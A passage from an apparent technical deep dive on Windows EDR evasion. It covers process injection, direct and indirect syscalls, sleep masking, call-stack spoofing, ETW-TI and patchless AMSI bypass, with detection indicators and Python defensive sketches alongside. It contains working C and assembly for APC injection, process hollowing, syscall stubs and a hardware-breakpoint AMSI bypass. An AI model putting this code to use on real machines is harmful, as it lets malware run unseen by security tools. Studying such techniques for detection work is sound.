This sequence has been a primary detection signature in commercial EDR products since approximately 2014 and is detected by every modern product through a combination of the thread-creation kernel callback, the OpenProcess access-mask request pattern, and the post-allocation memory protection state. Operationally non-viable on monitored endpoints.

APC Injection (T1055.004)

Queue a callback to a thread that’s already in alertable wait state. Payload runs on the existing thread when it next pumps.

```
  target process
 ┌───────────────┐
 │   thread A    │
 │ SleepEx(...)  │  ← alertable wait
 └───────────────┘
         ▲
         │  NtQueueApcThreadEx(threadA, callback=rmt_buf, ...)
         │
 ┌─────────────────────┐
 │ OpenThread(THREAD_  │
 │   SET_CONTEXT, ...) │
 │ VirtualAllocEx      │
 │ WriteProcessMemory  │
 │ NtQueueApcThreadEx  │
 └─────────────────────┘
        operator
```

A trimmed implementation:

```c
HANDLE hT = OpenThread(THREAD_SET_CONTEXT | THREAD_QUERY_LIMITED_INFORMATION,
                       FALSE, alertable_tid);
LPVOID rmt = VirtualAllocEx(hP, NULL, sz, MEM_COMMIT, PAGE_EXECUTE_READ);
WriteProcessMemory(hP, rmt, sc, sz, NULL);

// not the Win32 helper: direct call to the native, which most EDRs
// hook differently than QueueUserAPC
NTSTATUS rc = NtQueueApcThreadEx(hT, NULL,
                                 (PIO_APC_ROUTINE)rmt,
                                 NULL, NULL, NULL);

// optional: force the queue to drain even if the thread never enters alertable state
NtAlertResumeThread(hT, NULL);
```

Detection profile:

Advantages:

- No thread creation event: the payload executes on a pre-existing thread, so no PsSetCreateThreadNotifyRoutine callback fires.

- Process tree remains structurally normal; no anomalous child or thread.

Disadvantages:

- Requires the target thread to enter an alertable wait state. CPU-bound threads never qualify.

- Cross-process NtQueueApcThread and NtQueueApcThreadEx invocations are emitted as events by the ETW Threat-Intelligence provider on Windows 10 1903 and later.

Operational variants:

- EarlyBird APC: the APC is queued against a thread in a freshly created suspended process before the image-load callback for that process fires. The injection completes before EDR initialization in the target process.

- NtTestAlert forced drain: NtTestAlert transitions the calling thread through an alertable state, forcing pending APCs to drain even on a CPU-bound thread.

Process Hollowing (T1055.012)

Create a target process in a suspended state, unmap its original image, allocate replacement memory at the original base address, write a payload PE image, update the entry-point register in the suspended thread’s context, and resume:

```c
PROCESS_INFORMATION pi = {0};
STARTUPINFOA si = { .cb = sizeof si };
CreateProcessA("C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL,
               FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

CONTEXT ctx = { .ContextFlags = CONTEXT_FULL };
GetThreadContext(pi.hThread, &ctx);

PVOID peb_imageBase_ptr = (PVOID)(ctx.Rdx + 0x10);  // PEB->ImageBaseAddress
PVOID image_base = NULL;
ReadProcessMemory(pi.hProcess, peb_imageBase_ptr,
                  &image_base, sizeof image_base, NULL);

NtUnmapViewOfSection(pi.hProcess, image_base);

LPVOID nb = VirtualAllocEx(pi.hProcess, image_base, payload_image_size,
                           MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, nb, payload_pe, payload_image_size, NULL);

ctx.Rcx = (DWORD64)nb + payload_entry_rva;
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
```

Detection indicators:

- PEB inconsistency: ImagePathName references the original (notepad) but the in-memory image is the payload PE.

- Memory at the original image base presents as MEM_PRIVATE rather than MEM_IMAGE after the unmap-and-replace.

- The new payload image has no entry in PEB.Ldr.InMemoryOrderModuleList.

- The kernel’s image-load notification callback fires for the original image, not the replacement, producing an inconsistency between the kernel-recorded image and the in-memory bytes.

Process hollowing produces high behavioral signal against current commercial EDR products.

Process Doppelgänging and Process Ghosting

Both techniques exploit corner cases in the Windows loader to dissociate the on-disk file from the in-memory image:

- Process Doppelgänging uses the Transactional NTFS API. The attacker opens a file within a transaction, overwrites it with payload bytes, creates an image section from the transactional view, rolls back the transaction, and creates a process from the section handle. The file on disk after rollback is the original; the in-memory image is the payload.

- Process Ghosting opens a file with FILE_DISPOSITION_DELETE (or DELETE_ON_CLOSE), writes the payload, then closes the handle while the file is in the pending-deletion state. A section created from the file while it is pending deletion persists; a process can be created from the section even though the file is no longer accessible by path. By the time the EDR’s image-load callback fires, the originating file no longer exists at any path.

Both techniques bypass signature-based static scanners that read the on-disk file. Behavioral detection identifies the anomalous section-creation API sequences (NtCreateSection from a transacted file handle; NtCreateSection after FILE_DISPOSITION_DELETE).

Reflective DLL Loading

Stephen Fewer’s reflective injection technique. The DLL exports a ReflectiveLoader() function that performs the in-memory mapping operations normally executed by ntdll!LdrLoadDll: section copying, base relocation processing, import resolution via LoadLibraryA/GetProcAddress, and DllMain invocation with DLL_PROCESS_ATTACH. The OS loader is never invoked; no PEB.Ldr entry is created.

Bypasses path-based and signed-DLL-load detection. Detected by memory-scan logic (unbacked executable region, no corresponding PEB.Ldr entry).

For modern reflective loaders combined with sleep obfuscation and call-stack spoofing, see my Shellcode Loaders deep dive and the Beacon post.

Module Stomping

Load a legitimate signed DLL into the target process, modify the page protections of its .text section to writable, overwrite with payload bytes, restore PAGE_EXECUTE_READ, and transfer execution. The resulting executable region is image-backed (defeating the unbacked-private-commit detection), but the byte content does not match the on-disk file (defeating backing-file integrity checks).

The VirtualProtect invocation that converts the DLL’s .text from PAGE_EXECUTE_READ to a writable protection generates an ETW-TI memory-protection-change event and is the principal detection signal.

A refined variant, Phantom DLL Hollowing, uses a transacted-file-backed section: allocate a section whose backing file is a legitimate DLL but whose contents have been overwritten via NTFS transaction rollback. The section presents as image-backed and the on-disk file matches signed expectations, but the in-memory bytes diverge.



Direct and Indirect System Calls

Standard path traverses the hooked ntdll stub. Direct syscall executes the syscall instruction from attacker-controlled code. Indirect syscall executes the syscall instruction from within ntdll, preserving stack-frame consistency.

Hooking Topology of ntdll.dll

EDR products inject their user-mode DLL into target processes and overwrite the first bytes of ntdll!Nt* stub functions with a JMP rel32 to an EDR-controlled hook routine. All standard Win32 API calls (kernel32!CreateFile → kernelbase!CreateFile → ntdll!NtCreateFile) reach the patched bytes and are inspected. Bypassing user-mode hooking means executing the kernel-transition instruction (syscall) without going through the patched stub.

Direct System Calls

The attacker reimplements the syscall stub in their own code. The ntdll stub is bypassed entirely.

```asm
; my_NtAllocateVirtualMemory:
; args already in RCX, RDX, R8, R9, [rsp+0x28], [rsp+0x30]
mov r10, rcx                  ; the syscall ABI uses r10, not rcx
mov eax, dword [g_ssn_alloc]  ; SSN resolved at runtime
syscall
ret
```

System Service Numbers (SSNs) change between Windows builds. SSN resolution at runtime is implemented by one of the following techniques:

- Hell’s Gate: reads the first instructions of each ntdll!Nt* stub and extracts the SSN from the mov eax, ssn instruction. Fails when the EDR’s inline hook has overwritten those bytes.

- Halo’s Gate: Hell’s Gate with an adjacency fallback. When a target stub is hooked, the resolver reads the SSN of a neighboring unhooked stub (stubs are laid out 32 bytes apart) and adjusts it by the number of stubs between the two (SSNs of adjacent Nt* stubs are sequential within a Windows version).

- Tartarus’ Gate: extends Halo’s Gate with detection of indirect-JMP trampolines used by some vendors instead of direct JMP rel32 patches.

- FreshyCalls: enumerates all Nt* exports in ntdll and sorts them by export RVA. The lowest-addressed export corresponds to SSN 0, the next to SSN 1, and so on. Does not require reading the stub bytes; immune to inline patching.

- RecycledGate: combines FreshyCalls export-address sorting with Halo’s Gate adjacency fallback for robustness against partial hooking.

- SysWhispers4: build-time code generator that emits per-build assembly stubs from an API list. Supports Windows NT 3.1 through Windows 11 24H2 across x64, x86, WoW64, and ARM64 architectures. Repository: JoasASantos/SysWhispers4.

- Sysplant: Python-based stub generator supporting Tartarus’ Gate, FreshyCalls, SysWhispers2/3, and Canterlot’s Gate. Integrated into Cobalt Strike 4.10 and later.

- Acheron: Go assembly implementation of indirect syscalls for Go-based payloads. Repository: f1zm0/acheron.

Indirect System Calls

The attacker resolves the SSN as in the direct-syscall case, but rather than executing the syscall instruction from attacker-controlled code, transfers control via JMP to an existing syscall instruction inside ntdll.dll. On entry to kernel mode, the stack frame’s return address points into ntdll, satisfying stack-walk verification logic that flags returns into non-ntdll modules as anomalous.

```asm
; my_indirect_NtAllocateVirtualMemory:
mov r10, rcx
mov eax, dword [g_ssn_alloc]
jmp qword [g_ntdll_syscall_gadget]  ; address of an unhooked
                                    ; `syscall; ret` gadget in ntdll
```

The “gadget” is any address in ntdll.dll’s .text section that contains the byte sequence 0F 05 C3 (syscall; ret). At process initialization, the loader scans ntdll.dll’s code section, locates the first such sequence, and stores the address. All indirect-syscall stubs jump to this stored address. RedOps published a detailed walk-through of the technique.

Note: Direct and indirect syscalls evade user-mode hook inspection only. They do not affect kernel-mode notification callbacks, ETW Threat-Intelligence emissions, or memory scanning. The kernel-side telemetry surface is unaffected.

Sleep Obfuscation (Sleep Masks)

A long-running implant spends the majority of its execution lifetime in idle wait states between command-and-control check-ins. During these wait states, the implant’s memory layout is statically vulnerable to scanning: the configuration block contains C2 endpoints in plaintext, the executable region holds shellcode at PAGE_EXECUTE_READ, encryption keys reside in .data, and the thread’s call stack identifies the implant code via return-address analysis.

Sleep obfuscation (commonly termed sleep masking) is the technique of executing a small encryption routine before and after every sleep interval. Before the sleep, the implant’s memory is encrypted in place and page protections are reset to read-only or no-access. After the sleep, the routine restores executable protections and decrypts. EDR memory scans performed during the sleep window observe encrypted, non-executable bytes.

| Technique | Primitive | What it hides / adds | Repo |
|---|---|---|---|
| Ekko | Timer queue (CreateTimerQueueTimer chain) + ROP via NtContinue | Whole implant region during sleep | Cracked5pider/Ekko |
| FOLIAGE | APC chain on a single thread | Implant region; uses APCs to chain encrypt → sleep → decrypt | various PoCs |
| Zilean | WaitForSingleObject + thread context | Newer Cobalt Strike-flavored mask | various PoCs |
| Cronos | Same as Ekko but uses WaitForSingleObjectEx and toggles PAGE_NOACCESS | Adds memory protection toggle on top | various PoCs |
| AceLdr | Ekko + custom UDRL + heap encryption | Full Cobalt Strike loader + sleep mask | kyleavery/AceLdr |
| DreamWalkers | Stack spoofing + sleep mask + module ghost-loading | Combines sleep + call-stack spoof | MaxDcb/DreamWalkers |

Ekko’s core mechanism: a timer queue is created, populated with a sequence of NtContinue-based callbacks, and each callback receives a fully constructed CONTEXT record specifying the next instruction pointer and register state. The sequence:

1. VirtualProtect(beacon_region, PAGE_READWRITE)

2. RtlEncryptMemory / XOR / AES-CTR encrypt over the region

3. WaitForSingleObject (the actual sleep wait)

4. RtlDecryptMemory / XOR / AES-CTR decrypt

5. VirtualProtect(beacon_region, PAGE_EXECUTE_READ)

6. Return to normal beacon flow

Each step is implemented as a separate timer callback whose CONTEXT is crafted such that NtContinue jumps to the next desired API entry point. The implant thread never executes a literal Sleep call within the implant’s own code; the wait is performed by the timer-queue worker thread. A memory scan executed during step 3 observes encrypted, non-executable bytes. The plaintext exposure window exists only between steps 4 and 5, and is below typical scanner cadence.

Detection methods that defeat sleep masking:

- Control Flow Guard: CFG-protected processes refuse NtContinue calls to addresses not registered in the CFG bitmap. CodeX’s sleepmask_ekko_cfg implements a CFG-compatible variant.

- ETW Threat-Intelligence memory protection events: every VirtualProtect invocation that toggles executable status emits an event. Frequency analysis identifies the periodic toggle pattern characteristic of sleep masks.

- Unwind-info inconsistency: if a timer-queue callback’s stack frame does not correspond to a registered RUNTIME_FUNCTION with valid unwind data, the EDR can flag the anomaly.
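The frequency analysis mentioned for the memory-protection events can be sketched as a regularity test over the moments a region loses its executable bit. This is a minimal illustration, not a description of any product’s logic: the event tuple layout, the function names, and the `min_cycles` and `max_cv` thresholds are assumptions chosen for the example. The PAGE_* values are the standard winnt.h constants.

```python
from statistics import mean, pstdev
from typing import Iterable, Tuple

# PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80

# (timestamp in seconds, old protection, new protection) for ONE memory region
ProtectEvent = Tuple[float, int, int]


def is_executable(protect: int) -> bool:
    return bool(protect & EXEC_MASK)


def looks_like_sleep_mask(events: Iterable[ProtectEvent],
                          min_cycles: int = 4,
                          max_cv: float = 0.35) -> bool:
    """Return True when executable -> non-executable flips recur at a steady period.

    The coefficient of variation (stddev / mean) of the gaps between flips is
    used as the regularity measure; both thresholds are illustrative guesses.
    """
    drops = sorted(t for t, old, new in events
                   if is_executable(old) and not is_executable(new))
    if len(drops) < min_cycles + 1:
        return False
    gaps = [later - earlier for earlier, later in zip(drops, drops[1:])]
    average = mean(gaps)
    if average <= 0:
        return False
    return pstdev(gaps) / average <= max_cv
```

Implants that add jitter to their sleep interval raise the coefficient of variation, so a fixed threshold trades false negatives against false positives. The sketch only shows the shape of the test.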

Call Stack Spoofing

When a kernel-mode notification callback fires (e.g., on NtAllocateVirtualMemory), the EDR can walk the calling user-mode thread’s stack to record the chain of return addresses. A return address pointing into a private (MEM_PRIVATE) memory region characteristic of unbacked shellcode is a high-confidence indicator of malicious code execution.

Two principal call-stack spoofing approaches:

Synthetic frame construction. The attacker constructs a fabricated stack containing return addresses that point into legitimate, file-backed code regions (kernel32!BaseThreadInitThunk, ntdll!RtlUserThreadStart). The fabricated stack is installed on the calling thread before invoking sensitive APIs. Implementations: VulcanRaven, LoudSunRun. Effective for short-duration single API calls.

Desynchronized stack unwinding. Return-oriented programming techniques are used to decouple actual control flow from the recoverable unwind chain. The CPU executes correct instruction sequences, but the unwinder follows fabricated RBP chains that terminate in legitimate function frames. Implementation: SilentMoonwalk (fully dynamic, no per-API stub generation required).

```
Real call stack                           What the EDR sees
─────────────────                         ──────────────────
┌──────────────────┐                      ┌──────────────────┐
│ shellcode loader │                      │ ntdll!RtlUserThd │ ← spoofed top
│ unbacked region  │                      │ kernel32!BTIThnk │
├──────────────────┤                      ├──────────────────┤
│ NtAllocateVMem   │                      │ user32!Some()    │
├──────────────────┤                      ├──────────────────┤
│ ntdll!Nt* stub   │    desync via ROP    │ ntdll!Nt* stub   │
├──────────────────┤                      ├──────────────────┤
│ kernel transition│                      │ kernel transition│
└──────────────────┘                      └──────────────────┘
```

Detection counter-techniques against stack spoofing:

- Verification that the third stack frame from the bottom is a return address within the thread’s registered start function. Both SilentMoonwalk modes can fail this verification.

- Detection of RBP chains pointing into MEM_PRIVATE regions.

- Validation of unwind-info consistency: comparison of the registered RUNTIME_FUNCTION for an address against the actual function prologue at that address. Synthetic frames frequently fail this check because the borrowed return addresses do not correspond to legitimate function entries.
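The first two counter-techniques can be illustrated with a small stack audit that operates on already-collected data. The sketch below assumes the defender has a list of return addresses (innermost frame first), a region map of the kind VirtualQueryEx would yield, and address ranges for the expected base-of-stack functions. `Region`, `Func`, and `audit_stack` are hypothetical names introduced for the example; the MEM_* values are the standard winnt.h constants.

```python
from typing import List, NamedTuple, Optional, Sequence

MEM_PRIVATE = 0x20000    # winnt.h
MEM_IMAGE = 0x1000000    # winnt.h


class Region(NamedTuple):
    base: int
    size: int
    mem_type: int


class Func(NamedTuple):
    name: str
    start: int
    end: int  # exclusive


def region_type(regions: Sequence[Region], addr: int) -> Optional[int]:
    """Return the memory type of the region containing addr, or None."""
    for region in regions:
        if region.base <= addr < region.base + region.size:
            return region.mem_type
    return None


def audit_stack(frames: Sequence[int],
                regions: Sequence[Region],
                base_chain: Sequence[Func]) -> List[str]:
    """Report frames in private memory and base frames outside expected functions.

    base_chain lists the expected functions for the bottom of the stack,
    outermost first (for example RtlUserThreadStart, BaseThreadInitThunk,
    then the thread's registered start function).
    """
    findings = []
    for index, addr in enumerate(frames):
        kind = region_type(regions, addr)
        if kind is None:
            findings.append(f"frame {index}: 0x{addr:x} is not in any known region")
        elif kind == MEM_PRIVATE:
            findings.append(f"frame {index}: 0x{addr:x} returns into MEM_PRIVATE memory")
    for depth, func in enumerate(base_chain, start=1):
        if depth > len(frames):
            findings.append(f"stack too short to contain {func.name}")
            continue
        addr = frames[-depth]
        if not (func.start <= addr < func.end):
            findings.append(f"frame -{depth}: 0x{addr:x} is outside {func.name}")
    return findings
```

An empty result means only that these two checks passed. The unwind-info comparison in the last bullet needs the module’s exception directory and is not covered here.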

The current state-of-the-art combined sleep + stack-spoofing implementation is DreamWalkers, which integrates Ekko-style sleep masking, dynamic stack-spoofing, and ghost-mapped module loading.

ETW Threat-Intelligence Provider Bypass

The Microsoft-Windows-Threat-Intelligence provider is implemented in the kernel image. Events are emitted by the kernel after operation completion and are unaffected by user-mode ntdll!EtwEventWrite patching. Consumer subscription requires the consuming process to run as PsProtectedSignerAntimalware (PPL-Antimalware).

Three principal bypass approaches:

1. Hardware-breakpoint installation via NtContinue. Praetorian’s published research documented that SetThreadContext calls with CONTEXT_DEBUG_REGISTERS flags produce an EtwTiLogSetContextThread event in the TI provider. The same operation performed via NtContinue updates the debug registers without traversing the kernel code path that emits the event. Reference sequence:

// Full PoC requires VEH installation and CONTEXT_DEBUG_REGISTERS handling

CONTEXT ctx = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };

ctx.Dr0 = (DWORD64)AmsiScanBuffer;

ctx.Dr7 = 0x1; // local-enable Dr0

NtContinue(&ctx, FALSE); // installs DR0/DR7 without TI event emission

The installed hardware breakpoint redirects AmsiScanBuffer execution into a vectored exception handler that synthesizes a clean scan result. No code bytes are modified in amsi.dll, eliminating the in-memory patch signature that the EDR’s scanner would detect.

2. SecurityTrace-flag consumption. Covered in Part 1. A subset of TI events is consumable without PPL by exploiting the SecurityTrace flag.

3. PPL elevation via BYOVD. Tools including EDRSandblast, Backstab, EDRSilencer, and Sealighter-TI use a vulnerable signed driver to modify EPROCESS->Protection to PsProtectedSignerAntimalware, after which standard ETW-TI subscription succeeds. Microsoft’s vulnerable-driver blocklist closes most known paths; viable BYOVD candidates are tracked at LOLDrivers.

Patchless AMSI Bypass via Hardware Breakpoints

The historical AMSI bypass overwriting the first bytes of amsi.dll!AmsiScanBuffer with mov eax, 0x80070057; ret produces an in-memory patch detectable by any memory scanner that hashes the .text section against the on-disk file. Modern EDR products detect this signature. Current evasion uses hardware breakpoints and a Vectored Exception Handler:

LONG CALLBACK Veh(PEXCEPTION_POINTERS ep)

{

if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP &&

(ULONG_PTR)ep->ExceptionRecord->ExceptionAddress == g_amsi_scan_buf)

{

// 5th param of AmsiScanBuffer is the result pointer

// x64 calling: it's at [rsp+0x28] before the call

AMSI_RESULT* pRes = *(AMSI_RESULT**)(ep->ContextRecord->Rsp + 0x28);

if (pRes) *pRes = AMSI_RESULT_CLEAN;

// skip the function: pop return address into RIP, fix RAX

ep->ContextRecord->Rip = *(DWORD64*)ep->ContextRecord->Rsp;

ep->ContextRecord->Rsp += 8;

ep->ContextRecord->Rax = 0; // S_OK

return EXCEPTION_CONTINUE_EXECUTION;

}

return EXCEPTION_CONTINUE_SEARCH;

}

void install(void)

{

AddVectoredExceptionHandler(1, Veh);

CONTEXT c = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };

GetThreadContext(GetCurrentThread(), &c);

c.Dr0 = g_amsi_scan_buf;

c.Dr7 = (c.Dr7 & ~0xF) | 0x1; // local enable Dr0, length=1, type=execute

SetThreadContext(GetCurrentThread(), &c);

// for full stealth: NtContinue instead of SetThreadContext (see ETW-TI section)

}

Limitation: hardware-breakpoint installation is per-thread. For inline AMSI scanning of a single .NET assembly load, the AMSI scan and the load occur on the same thread, so single-thread instrumentation is sufficient. For multi-threaded scenarios (PowerShell with runspace thread pools), each thread of interest must be instrumented separately.
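Because the breakpoints live in per-thread debug registers, a defender that enumerates threads and reads each thread’s context can decode Dr7 and compare Dr0 through Dr3 against addresses it cares about. The sketch below decodes the architectural Dr7 layout (enable bits 0 to 7, RW/LEN fields from bit 16). The function names, the dictionary shape, and the `watched` mapping are assumptions made for the example, and how the register values are obtained is left out.

```python
from typing import Dict, List, Sequence

RW_NAMES = {0: "execute", 1: "write", 2: "io", 3: "read/write"}
LEN_BYTES = {0: 1, 1: 2, 2: 8, 3: 4}  # architectural LEN field encoding


def decode_dr7(dr7: int) -> List[dict]:
    """Return one entry per enabled hardware breakpoint slot (0..3)."""
    slots = []
    for n in range(4):
        local = bool((dr7 >> (2 * n)) & 1)
        global_ = bool((dr7 >> (2 * n + 1)) & 1)
        if not (local or global_):
            continue
        rw = (dr7 >> (16 + 4 * n)) & 0b11
        length = (dr7 >> (18 + 4 * n)) & 0b11
        slots.append({
            "slot": n,
            "local": local,
            "global": global_,
            "type": RW_NAMES[rw],
            "length": LEN_BYTES[length],
        })
    return slots


def flag_watched_breakpoints(dr: Sequence[int], dr7: int,
                             watched: Dict[int, str]) -> List[str]:
    """Name the watched functions that carry an enabled execute breakpoint.

    dr is (Dr0, Dr1, Dr2, Dr3); watched maps an address to a label such as
    "amsi!AmsiScanBuffer" (the mapping is supplied by the caller).
    """
    return [watched[dr[s["slot"]]]
            for s in decode_dr7(dr7)
            if s["type"] == "execute" and dr[s["slot"]] in watched]
```

A hit on a security-relevant export in a process that is not being debugged is the kind of signal this decoding supports. Threads created after the sweep need their own pass, for the same per-thread reason stated above.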

Alternative implementations that do not patch amsi.dll:

- CLR AmsiContext field nullification. The CLR maintains an AmsiContext pointer after AMSI initialization. Locating this field via .NET runtime structure traversal and writing zero disables subsequent Assembly.Load-time AMSI scanning. The amsi.dll binary remains unmodified.

- Per-process AMSI session corruption. Modifying the amsiSession field within the calling process’s clr.dll instance disables AMSI scanning for that process. Other processes’ AMSI behavior is unaffected.

CrowdStrike published a technical analysis of patchless AMSI bypass detection documenting the behavioral signals their product uses against these techniques.
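For contrast, the integrity check that catches the historical byte patch is simple to sketch, which is part of why patchless variants exist. The example below compares a section’s in-memory bytes with the same section taken from the on-disk file and reports where they diverge. It assumes both buffers are already extracted and equal in length. The function names and the `max_ranges` cap are illustrative, and a real scanner also has to account for relocations and other legitimate loader-applied changes.

```python
import hashlib
from typing import List, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def diff_ranges(disk: bytes, memory: bytes,
                max_ranges: int = 8) -> List[Tuple[int, int]]:
    """Return (offset, length) runs where memory differs from disk."""
    if len(disk) != len(memory):
        raise ValueError("section buffers must have the same length")
    runs: List[Tuple[int, int]] = []
    start = None
    for offset, (a, b) in enumerate(zip(disk, memory)):
        if a != b:
            if start is None:
                start = offset
        elif start is not None:
            runs.append((start, offset - start))
            start = None
            if len(runs) == max_ranges:
                return runs
    if start is not None:
        runs.append((start, len(disk) - start))
    return runs


def check_text_integrity(disk: bytes, memory: bytes) -> List[Tuple[int, int]]:
    """Hash first (cheap), then locate modified runs only on mismatch."""
    if sha256_hex(disk) == sha256_hex(memory):
        return []
    return diff_ranges(disk, memory)
```

A hardware-breakpoint bypass leaves this check returning an empty list, so detection has to move to thread context and exception-handler state.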

Bring Your Own Vulnerable Driver (BYOVD)